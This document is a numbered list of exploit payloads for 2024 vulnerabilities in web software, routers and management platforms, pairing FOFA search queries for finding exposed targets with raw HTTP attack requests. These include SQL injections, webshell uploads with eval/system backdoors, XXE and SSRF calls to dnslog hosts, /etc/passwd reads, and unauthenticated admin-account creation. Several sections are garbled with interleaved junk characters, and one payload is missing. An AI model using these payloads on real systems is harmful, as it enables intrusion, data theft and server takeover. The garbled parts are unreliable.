Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth:替换为自己的
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (北京百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (北京百绰) Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Byzoro (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

) |8 D, Q" T6 _" h( O5 _, S6 L8 ]129. Adobe ColdFusion 任意文件读取
$ \9 A' L- [/ ~& c8 {5 F7 C) yCVE-2024-20767% _3 o- Y; K( Q& a8 ~( N+ L2 v
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
+ N3 o# z  `5 y1 {; j第一步,获取uuid5 i/ ^% P8 B, r& O
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 ~. F* C/ n; {# ~! r( _Host: x.x.x.x
+ \6 w. `2 u  N- f2 i" H' y) I- EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36* f6 W1 Q& n( F
Accept: */*! k, D7 K. J5 a9 J& P( M
Accept-Encoding: gzip, deflate, z  \" X2 y( i. e8 e" W
Connection: close  }9 y+ N8 R+ S" b7 R2 n
0 m% V5 F/ E5 @8 N
- p0 k9 ~% ^; ?' k2 y& w% \
第二步,读取/etc/passwd文件5 i5 G1 }! z" V  t
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
. g$ j& C2 K: Y+ W7 ?Host: x.x.x.x" b7 ?! E" V/ X  m3 U9 T) ~: K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* b- U& N$ }; I& @; eAccept: */*& m5 C  F7 [: Z8 E% f# H* d4 g& i* ]5 J
Accept-Encoding: gzip, deflate
* X( \7 v1 A1 z1 U! v* jConnection: close
* N& x7 L9 D* O) ~( Fuuid: 85f60018-a654-4410-a783-f81cbd5000b94 [( R2 C5 u; C( s8 {
$ ?5 s( s- y9 b. I

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

: T$ s7 D" r3 w9 k; Y8 n136. NextChat cors SSRF
4 q  i( {+ A9 B/ U- L! u+ `CVE-2023-497854 p  [$ r; j! S# T
FOFA:title="NextChat"
( U3 }/ a2 H; x) sGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
' }9 j5 q8 k! d+ a# _Host: x.x.x.x:100003 ?# |6 P- P0 n6 ~3 Z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 Y0 X5 m  }) X; P5 e) Q9 ?
Connection: close
$ ?# @. M1 u7 i, W. I, UAccept: */*
3 @( }' Y: B2 w- z3 q2 Z! L$ {% p. DAccept-Language: en6 N1 E  \0 E0 G# ?9 b% n0 {
Accept-Encoding: gzip! H5 H3 j" S: `& m$ N8 n: j
( x6 Y. d- `9 m9 x' A. I& ^

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

1 |( d7 h" D" q( o; s/ `+ H# G140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 b9 M5 _. m# U. J$ r) n, PCVE-2024-2566* ~3 H7 m0 Y6 |  _1 ?& R: k, U
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
